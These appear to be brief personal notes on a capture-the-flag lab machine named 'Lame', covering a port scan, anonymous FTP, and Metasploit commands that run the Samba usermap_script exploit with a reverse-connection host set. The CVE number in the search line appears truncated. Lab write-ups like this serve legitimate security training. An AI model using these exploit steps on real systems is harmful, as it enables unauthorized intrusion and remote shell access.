Lame Machine (easy)
- nmap: 139,445,22,21,
- Seems like theres no icmp (firewall rules)
- FTP anonymous allowed…
- lets see the ftp
- I found nothing interesing
- lets see if there is an exploit for this version of the ftpd
- there is a exploit but doesnt seems to work
- smb
- seems to have an exploit as well
- lets go to msfconsole
search cve:2007-244
use exploit/multi/samba/usermap_script
options
set rhost 10.10.10.3
set lhost 10.10.14.6
exploit